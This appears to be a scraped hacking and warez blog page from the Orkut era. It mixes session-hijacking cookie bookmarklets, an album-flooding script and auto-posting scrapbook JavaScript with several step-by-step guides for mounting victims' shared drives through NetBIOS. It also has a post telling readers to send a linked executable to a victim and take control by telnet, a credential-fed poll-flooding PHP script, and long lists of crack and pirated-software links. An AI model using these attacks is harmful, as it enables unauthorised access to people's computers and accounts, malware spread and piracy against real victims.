// Do not edit anything below + don't steal credits!!
function reply2(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[3].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply3(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[5].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply4(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[7].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply5(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[9].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply6(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[11].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply7(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[13].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply8(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[15].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply9(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[17].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply20(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[19].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
function reply21(){
txt = prompt("Enter Your Reply: (Please Visit http://www.gautamsofts.com/ or http://blog.gautamsofts.com/ )", "");
txtcomp = encodeURIComponent(txt + sig);
a = document.forms[3];
var c=document.forms[3].elements[21].value;
var b=c.split("/");
a.action = "/Scrapbook.aspx?toUserId=" + b[2] + "&rawAddedDate=" + b[1] + "&scrapText=" + txtcomp + "&Action.submit=1";
a.submit();
}
var fnCheckShortcut2;
fnCheckShortcut2 = function (e) {if (e.shiftKey && e.keyCode == 112) {reply2();}};
document.addEventListener("keydown", fnCheckShortcut2, 0);
var fnCheckShortcut3;
fnCheckShortcut3 = function (e) {if (e.shiftKey && e.keyCode == 113) {reply3();}};
document.addEventListener("keydown", fnCheckShortcut3, 0);
var fnCheckShortcut4;
fnCheckShortcut4 = function (e) {if (e.shiftKey && e.keyCode == 114) {reply4();}};
document.addEventListener("keydown", fnCheckShortcut4, 0);
var fnCheckShortcut5;
fnCheckShortcut5 = function (e) {if (e.shiftKey && e.keyCode == 115) {reply5();}};
document.addEventListener("keydown", fnCheckShortcut5, 0);
var fnCheckShortcut6;
fnCheckShortcut6 = function (e) {if (e.shiftKey && e.keyCode == 116) {reply6();}};
document.addEventListener("keydown", fnCheckShortcut6, 0);
var fnCheckShortcut7;
fnCheckShortcut7 = function (e) {if (e.shiftKey && e.keyCode == 117) {reply7();}};
document.addEventListener("keydown", fnCheckShortcut7, 0);
var fnCheckShortcut8;
fnCheckShortcut8 = function (e) {if (e.shiftKey && e.keyCode == 118) {reply8();}};
document.addEventListener("keydown", fnCheckShortcut8, 0);
var fnCheckShortcut9;
fnCheckShortcut9 = function (e) {if (e.shiftKey && e.keyCode == 119) {reply9();}};
document.addEventListener("keydown", fnCheckShortcut9, 0);
var fnCheckShortcut20;
fnCheckShortcut20 = function (e) {if (e.shiftKey && e.keyCode == 120) {reply20();}};
document.addEventListener("keydown", fnCheckShortcut20, 0);
var fnCheckShortcut21;
fnCheckShortcut21 = function (e) {if (e.shiftKey && e.keyCode == 121) {reply21();}};
document.addEventListener("keydown", fnCheckShortcut21, 0);

Speed Up Your Net Browsing


Speed Up Your Net Browsing using the following steps--

* Open "Start"--> "Run"--> type "gpedit.msc".

* You will see "Local Computer Policy".

* Expand the "Administrative Templates" Branch.

* Expand the "Network" Branch.

* Highlight "QoS Packet Scheduler".

* Double-click "Limit Reservable Bandwidth".

* Check "Enabled".

* Change "Bandwidth limit [%]" to "0%".

* Click "Apply" and then "OK" and then "Restart".

---------------------------------------------------------------------------------

dis is not a big deal -:p))

[ORKUT] ALBUM FLOODER

ALBUM FLOODER

javascript:var p=prompt("Enter Your Text","Album Flooding By KOK");function kok(){oug=document.forms[3].com.value=p;_addComment(1024);}void(setInterval(kok,800));

ENJOY -:|

[l33t]How to Hack Network Hard Drives using the cmd


In this step by step guide you will learn about: How to Hack Network Hard Drives using the command prompt.
Things to remember

* CP = Command Prompt
* HDs = Hard Drives

Step by Step:
1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.
2. Once in command prompt type
c:\windows>nbtstat -a 203.195.136.156
(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.
3. Let say that it gives you this

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6



The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------

NOTE - If you do not get this number there are three possible answers

A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.

B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.
C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers
4. Now in command prompt type
c:\windows>net view \\203.195.136.156 




Let's suppose we get the following output

Shared resources at \\203.195.136.156
The computer's name will be here

Share name Type Used as Comment

-------------------------------------------
CDISK Disk


The command completed successfully.
5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)
c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully

Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.

Continue to Hacking network printers with the command prompt

-:p))

Spreading viruses by ip =D


rapidshare.com/files/65228555/Chess.exe

download it ..
send it to victim ..
he must run it ..
go to telnet ..
-->run > telnet ..
type o
in 
type ip address .. of the victim ..
then if entered correctly ..
it would ask for username and password ..
enter
username:administrator
password:hack

WOOSH !!

u r in the victims PC ..
now u can control his PC using DOS commands ,,


i have use in my friend computer
right now i have nod32 can't use in my pc
ok got it

must be send comments


i have got frm other community. -:))

[ORKUT] Cookies stealin scripts


Javascript:cookie=prompt("Cookie:",'');if(cookie./*by 0wn3d*/indexOf("orkut_state")>=-1){document.cookie="orkut_state="+unescape(cookie);window.location="/Home.aspx";}else{document.cookie=unescape(cookie);window.location="/Home.aspx";}


javascript:document.cookie="orkut_state=Cookie";location.reload();


~A simple and easy way of using cookies in orkut~
javascript:alert("Script created by CHINTU ROCKS");ls="orkut_state part here";document.cookie=ls;location.reload();

[APP]PROXY SWITHERS -:|

proxy server ki dukan..[:p][:d]

http://rapidshare.com/files/100264100/proxy.rar
http://rapidshare.com/files/100264259/Proxy_tunneling_n_net_boosters.rar
http://rapidshare.com/files/100264351/proxyway.rar
http://rapidshare.com/files/100264467/proxyway_1_.rar
http://rapidshare.com/files/100264566/proxyway_2_.rar
http://rapidshare.com/files/100264617/ProxyWay_Extra_3.2.rar
http://rapidshare.com/files/100264639/ProxyWay_Extra_3.2UploadBySunfire.rar
http://rapidshare.com/files/100264765/ProxyWay_Extra_3.2UploadBySunfire_1_.rar
http://rapidshare.com/files/100264779/Stm_ins.rar
http://rapidshare.com/files/100264839/SurfNoLimitInstallation.rar
http://rapidshare.com/files/100264882/SurfolaProxyRedirector.rar
http://rapidshare.com/files/100265160/WinGate6.2.2.1137-USE.rar
http://rapidshare.com/files/100266649/eldyn_Dynamic_Domain_Updater.rar
http://rapidshare.com/files/100266810/A4Proxy_v2.8__2B_Crack.rar
http://rapidshare.com/files/100261491/eldyn_Dynamic_Domain_Updater.rar
http://rapidshare.com/files/100261762/A4Proxy_v2.8__2B_Crack.rar
http://rapidshare.com/files/100261768/A4Proxy_2.8.rar
http://rapidshare.com/files/100261886/ccproxy.rar
http://rapidshare.com/files/100262651/CheckpPro-HTTP-Demo-4.20-554.rar
http://rapidshare.com/files/100262666/elHTTPProxy100.rar
http://rapidshare.com/files/100262708/ezProxy.rar
http://rapidshare.com/files/100262799/Free_Proxy.rar
http://rapidshare.com/files/100262977/ghostsurf-platinum.rar
http://rapidshare.com/files/100263067/iampplus_pro.rar
http://rapidshare.com/files/100263110/iptunnelmng.rar
http://rapidshare.com/files/100263228/IQReverseProxy.rar
http://rapidshare.com/files/100263269/IQReverseProxyGUI.rar
http://rapidshare.com/files/100263379/IQWebFTPServer.rar
http://rapidshare.com/files/100263691/MECLBvr2X.rar
http://rapidshare.com/files/100263767/NetFile.rar
http://rapidshare.com/files/100264083/Proksi.rar




http://rapidshare.com/files/100261716/WinGateInstall .zip
http://rapidshare.com/files/100265187/a4proxy .zip
http://rapidshare.com/files/100265204/Anonymity_4_Proxy__A4Proxy__v2.8 .zip
http://rapidshare.com/files/100265220/Cr_ck_proxyway_ .zip
http://rapidshare.com/files/100265258/elHTTPProxy100 .zip
http://rapidshare.com/files/100265263/eternallinesetlinhttpproxyv1.0.0.26crackunderpl .zip
http://rapidshare.com/files/100265352/freeproxy .zip
http://rapidshare.com/files/100265361/httpclient .zip
[content suppressed] .zip
http://rapidshare.com/files/100265397/snd-proxywayextra3.2.cracked.exe_2_ .zip
http://rapidshare.com/files/100265455/WinGateHelp .zip
http://rapidshare.com/files/100266714/a4proxy .zip
http://rapidshare.com/files/100266743/WinGateInstall .zip

http://w15.easy-share.com/1701189620.html
vpn
VV
http://rapidshare.com/files/136367635/Steganos_Internet_Anonym_VPN_2008.rar


proxy hunter
VV

http://www.proxyhunter.net/proxyhunter/proxyhunter.rar

enjoy-:))

NetBios Hacking


[L33T]NetBios Hacking


NetBios hacking for windows 95/98/ME/NT/XP


Step 1
Get a IP (range) scanner. (superscanner is a fast one).
Scan the victim's ip on TCP/IP port 139

Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:windows>

This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.

c:windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS Remote Machine Name Table

Name Type Status
------------------------------
----------
-----------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down:

c:windows>net view 255.255.255.255

if the output is like this:

Shared resources at 255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx


The command completed successfully.


"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

type down:
you can replace x: by anything letter yopu want but not your own drive letters.
CDISK is the name of the shared harddrive.

c:windows>net use x: 255.255.255.255CDISK

If the command is successful we will get the confirmation.
The command was completed successfullly

Now open windows explorer or just double click on the My Computer icon on your

:p

PROXY LIST

PROXYZ

ACIDBROWSE.INFO
ACTIVEBROWSE.INFO
AFRICABROWSE.INFO
AMERICABROWSE.INFO
ANNUALBROWSE.INFO
AREABROWSE.INFO
ASIABROWSE.INFO
ASSETBROWSE.INFO
AVENUEBROWSE.INFO
AVGBROWSE.INFO
BIGADDABROWSE.INFO
BIGDOGBROWSE.INFO
CALLBROWSE.INFO
CAMBROWSE.INFO
CAPBROWSE.INFO
CAPITALBROWSE.INFO
CARBROWSE.INFO
CELLBROWSE.INFO
CITYBROWSE.INFO
COMMONBROWSE.INFO
COMPANYBROWSE.INFO
COMPLEXBROWSE.INFO
CONTROLBROWSE.INFO
CRICKETBROWSE.INFO
CYBERBROWSE.INFO
DISCOVERBROWSE.INFO
EARTHBROWSE.INFO
ENTRYBROWSE.INFO
EUROPEBROWSE.INFO
FACEBOOKBROWSE.INFO
FOOTBALLBROWSE.INFO
FOXBROWSE.INFO
FUNDBROWSE.INFO
GENERALBROWSE.INFO
GROUPBROWSE.INFO
GUCCIBROWSE.INFO
HI5BROWSE.INFO
HOLDINGBROWSE.INFO
HOTMAILBROWSE.INFO
ICEBROWSE.INFO
INDIANABROWSE.INFO
INDUSTRYBROWSE.INFO
INSANEBROWSE.INFO
KITKATBROWSE.INFO
LEVISBROWSE.INFO
LIFEBROWSE.INFO
LIMITEDBROWSE.INFO
LOVELYBROWSE.INFO
MAJORBROWSE.INFO
MANAGEBROWSE.INFO
MARSBROWSE.INFO
MEANBROWSE.INFO
MEGABROWSE.INFO
MINORBROWSE.INFO
MMSBROWSE.INFO
MONOBROWSE.INFO
MSNBROWSE.INFO
NAMEBROWSE.INFO
NATIONBROWSE.INFO
NATURALBROWSE.INFO
NATUREBROWSE.INFO
NAUGHTYBROWSE.INFO
NAVELBROWSE.INFO
NIKEBROWSE.INFO
NOMINALBROWSE.INFO
OBJECTBROWSE.INFO
ORDINARYBROWSE.INFO
ORKUTBROWSE.INFO
PACIFICBROWSE.INFO
PEOPLEBROWSE.INFO
PLAYERBROWSE.INFO
PRACTICALBROWSE.INFO
PREMIUMBROWSE.INFO
PRETTYBROWSE.INFO
PROFITBROWSE.INFO
PUBLICBROWSE.INFO
RAREBROWSE.INFO
REGISTEREDBROWSE.INFO
REVENUEBROWSE.INFO
ROOKIEBROWSE.INFO
SCRIPTBROWSE.INFO
SEXYBROWSE.INFO
SHARKBROWSE.INFO
SLEEPINGBROWSE.INFO
SMSBROWSE.INFO
SNOWBROWSE.INFO
SPEEDBROWSE.INFO
SSQHOLDINGS.COM
STATEBROWSE.INFO
STOCKBROWSE.INFO
SUCCESSBROWSE.INFO
SUNBROWSE.INFO


TAGGEDBROWSE.INFO
TAXBROWSE.INFO
TELEBROWSE.INFO
TEXASBROWSE.INFO
TISSOTBROWSE.INFO
TRUEBROWSE.INFO
UNDERCOVERBROWSE.INFO
UNIQUEBROWSE.INFO
UNLIMITEDBROWSE.INFO
URLBROWSE.INFO
VERTICALBROWSE.INFO
WAREZBROWSE.INFO
WWEBROWSE.INFO
ZIPBROWSE.INFO
ZORPIABROWSE.INFO

-:))

[RS LINKS] MOVIE ZONE

AFTER SEX  :-

AFTER SEX[MOIVE]

http://rapidshare.com/files/92582728/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part1.rar
http://rapidshare.com/files/92600214/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part2.rar
http://rapidshare.com/files/92611404/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part3.rar
http://rapidshare.com/files/92629428/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part4.rar
http://rapidshare.com/files/92640389/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part5.rar
http://rapidshare.com/files/92656070/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part6.rar
http://rapidshare.com/files/92667376/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part7.rar
http://rapidshare.com/files/92671017/After.Sex.2007.Festival.DVDRiP.XviD-iNTiMiD.part8.rar

Cheat Book 2008

cheat book 2008

http://rapidshare.com/files/122859410/CheatBook_Database_2008_-_Arif1490.rar.html


http://www.cheatbook.de/


ENJOY -:))

ORKUT POLL VOTER SOURCE

[source]poll votor

function MassVote() { 
//By Mr xXx 
function curl($a,$b,$c,$d,$e){ 
$ch = curl_init(); 
curl_setopt_array($ch, 
array( 
CURLOPT_URL => $a, 
CURLOPT_RETURNTRANSFER => $b, 
CURLOPT_COOKIE => $c, 
CURLOPT_HEADER => $d, 
CURLOPT_NOBODY => $d, 
CURLOPT_CUSTOMREQUEST => ($e)?"POST":"GET", 
CURLOPT_POSTFIELDS => $e 

); 
$g = curl_exec($ch); 
curl_close($ch); 
return $g; 


$email = Array( 
"email_1@hotmail.com", 
"email_2@hotmail.com", 
"email_3@hotmail.com"); 

$senha = Array( 
"senha_1", 
"senha_2", 
"senha_3"); 

$o = "http://www.orkut.com/"; 
$g = "https://www.google.com/accounts/ClientLogin?Email="; 
$link = $_POST['link_vote']; 
$option = $_POST['option']; 
$cmm = $_POST['cmm']; 

for($i=0;$i

$l = $email[$i]; 
$p = $senha[$i


---------------------------------------
ENJOY POLL flooding -:))

[LINK HEAVEN][WAREZ LINKS]

Clean Warez Links:
http://kickme.to/siana
http://www.khidmat.info/fileupload
http://kickme.to/yaplukon
http://www.iskushenie.ru/
http://kadets.ru/
http://~censored~/
http://sh-soft.h11.ru/
http://www.qpxqp.com/
http://www.nrg.to/joed
http://flashvn.blogsky.com/
ftp://209.13.135.66/sur/VARIOS
http://nhjm.net/~flasharena/html/index.php
http://home.wanadoo.nl/fullsoft/nieuw.htm
http://usefull1.tripod.com/
http://www.e-lunatic.org/
http://www.vanix.net/index.php
http://www.soft-best.net/
http://softobzor.net/
http://www.wheredown.com/
http://www.bsoft.ru/index.php
http://www.9down.com/index.php
http://www.r3mteam.org/index.php 




Direct crack DOWNLOADS For Popular Programs Only:
http://cs.co.ru/
http://bladez1999.cjb.net/
http://mp2k.host.sk/release.htm
http://www.salusoft.com/
http://www.seekndestroy.host.sk/
http://zor.org/tsrh
http://www.kpteam.com/
http://avenger.cvalka.net/index.php?page=main
http://www.anthrax83.fr.tc/
http://revenge.crackdb.com/




NEWEST Releases Of Apps + Fixes:
http://www.9down.com/index.php
http://www.zonapentel.com/index.html
http://www.format.org.ua:8181/news/index.htm
http://www.sonic2k.com/
http://www.thiweb.online.fr/
http://www.wheredown.com/
http://www.xnt.info/category.php?id=2
http://www.vanix.net/index.php
http://wilknet.no-ip.com/
http://www.bsoft.ru/index.php
http://www.e-lunatic.org/
http://megido.ru/
http://soft-best.net/index.php?language=eng
http://softobzor.net/modules.php?name=xNews&pagenum=1
http://kickme.to/siana
http://~censored~/
http://members.brabant.chello.nl/~r.beekelaar/app.htm
http://down.ttdown.com/
http://en.fixdown.com/all_1.htm 




Peer 2 Peer:
http://www.neo-modus.com/
http://www.emule-project.net/
http://www.kazaa.com/
http://sharereactor.com/
http://www.edonkey2000.com/
http://dcplusplus.sourceforge.net/
http://www.shareaza.com/
http://www.gnutella.com/
http://www.emuleplus.tk/
http://www.k-lite.tk/ 



SHAREWARE:
http://www.softpedia.com/
http://www.webattack.com/
http://www.download.com/
http://www.5star-shareware.com/ 



Miscellaneous Sites:
http://www.wheredown.com/
http://sh-soft.h11.ru/
http://www.appzworld.com/
http://bsoft.ru/index.php
http://www.webosoft.net/
http://flashvn.blogsky.com/
http://lunatic.sharewith.us/
http://kickme.to/themainlist
http://homepage.ntlworld.com/bennett.michael
http://kickme.to/superdisk2
http://www.serialz.to/
http://www.geocities.com/fosi1us
http://www.fosi.up.co.il/
http://dvm0day.blogspot.com/
http://bsoft.ru/
http://kadets.ru/
http://soft-best.net/
http://r3mteam.tk/
http://vanix.tk/
http://webwarez.net/
http://overdays.net/
http://appzplanet.com/
http://www.appzworld.com/
http://~censored~/
http://www.datowarez.info/
http://www.aladown.com/
http://www.gupin.com/
http://fixdown.com/
http://ttdown.com/
http://www.crsky.com/
http://www.crsky.net/
http://www.9down.com/
http://0daycn.net/
http://www.fbstu.com/
http://www.qpxqp.com/
http://fosisoft.home.ro/
http://kickme.to/fosi
http://fosi.ural.net/
http://www.fosiwarez.tk/
http://navig8.to/fosi
http://linkworld.to/fosi
http://leodonaire.tripod.com/
http://www.drsoftware.00page.com/
http://jajco.rezot.co.uk/
http://217.170.18.24/~rappie
http://www.necz.cjb.net/
http://neon.cd/
http://www.warezsector.com/warez-ix
http://www.linkking.org/
http://www.lwteam.ru/
http://wutun.idv.tw/enfor.htm
http://www.songtoday.com/
http://www.grc.com/
http://lnkworld.com/
http://gamecopyworld.com/
http://www.gamefaqs.com/
http://www.templatesearch.com/
http://www.freewebtemplates.com/
http://www.javascriptkit.com/
http://www.cgiscript.net/
http://www.dynamicdrive.com/
http://www.jsmadeeasy.com/
http://www.shorturl.com/
http://www.kickme.to/
http://www.phpbbhacks.com/
http://www.bbfree.com/
http://www.downshow.com/
http://www.fixdown.com/
http://www.ttdown.com/
http://www.cnyou.com/
http://www.soft168.com/
http://www.soft163.com/
http://www.99soft.com/
http://www.jetdown.com/
http://www.1777.netwww.3959.com/
http://www.chinesejia.com/ 



PIYUSH
http://www.acedown.com/
http://www.loadown.net/
http://soft.269.net/
http://down.51soft.com/soften.asp?softID=1504
http://www.bear5.com/
http://www.caiqing.net/
http://www.101uses.com/
http://stapleton.host.sk/Download/download.htm
http://download.gotonet.com.cn/html_dynamic.asp
http://www.easywarez.com/
http://home.kscable.com/elogic/
http://www.muieri.net/
http://down.tyfo.com/
http://elpa.myetang.com/soft/fyrj.htm
http://soft.jx163.com/
http://www.zj165.com/first.asp
http://www.apps2u.de.vu/
http://www.it.jsol.net/down/
http://61.159.224.200/flash/flashsoft/
http://www.liaokai.com/en/index.htm
http://www.directarchive.tmfweb.nl/
http://www.myitcn.com/jxts/index.htm
http://nerjinsoft.by.ru/softerra.htm
http://newsoft.keepcyber.com/ddl/index.shtml
http://www.pluhh.com/index_ps.htm
http://kickme.to/FOSI
http://www.shockunion.com/shock/software.htm
http://bensboy.home.chinaren.com/
http://www.moneys2008.com/down/eshow.php?sid=351
http://vdown.myrice.com/
http://202.109.129.8/softasp/softas...ass1=5&class2=1
http://www.wtapz.com/a/
http://www.newhua.com/ty_backup.htm
http://soft.km169.net/soft/html/4071.htm
http://download.51soft.com/html/d/desktopx.htm
http://www.bt.nm.cninfo.net/sortware/
http://extend.hk.hi.cn/~czy/
http://vdown.vicp.net/
http://www.yy-china.com/htm/bd_tx.htm
http://fwhp.cjb.net/start.htm?
http://home.wanadoo.nl/montenegro/1.html 



top crack si8
TOP crack Sites:

http://www.andr.net/
http://asta-killer.com/
http://astalavista.box.sk/
http://www.astalavista.us/
http://www.cracks.am/
http://www.serials.ws/
http://lomalka.ru/index.en.html
http://cracks.thebugs.ws/
http://got2share.com/ez/appz/list.htm
http://forum.asiaco.com/xsnx
http://www.powow.com/basecipher/find_serials.htm

[1337]exploit victim in 15sec


If your victim posess certain security flaws then her system can be broken into in less that 15 seconds.

This is how : -
Click "Start -> Run -> cmd"

Type the following at the Dos Prompt
Nbtstat –A IP address [e.g: nbtstat –A 207.175.1.1]

This will give you a read out that looks like this
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
------------------------------------
abhi <00> UNIQUE Registered
WORK <00> GROUP Registered
abhi <03> UNIQUE Registered
abhi <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
____________________________________

The numbers in the <> are hex code values. What we are
interested in is the “Hex Code” number of <20>.
A hex code of <20> means you have file and printer sharing turned on.

Next step is to find out what is being shared. This is how : -

Net view \\
[e.g : net view \\207.175.1.1]

You will then get a response that looks something like this.
Shared resources at \\ip_address
Sharename Type Comment
______________________
MY DOCUMENTS Disk
TEMP Disk
______________________
(The command was completed successfully.)

This shows you that your potential victim has their My
Documents Folder shared and their Temp directory shared. For
you to then get access to those folders next command will be.

Net use x: \\\temp
[e.g : net use x: \\207.175.1.1\temp]

If all goes well for you, you will then get a response of
(The command was completed successfully.)
Open my computer you will see your victim's temp folder there.

old but try dis -:|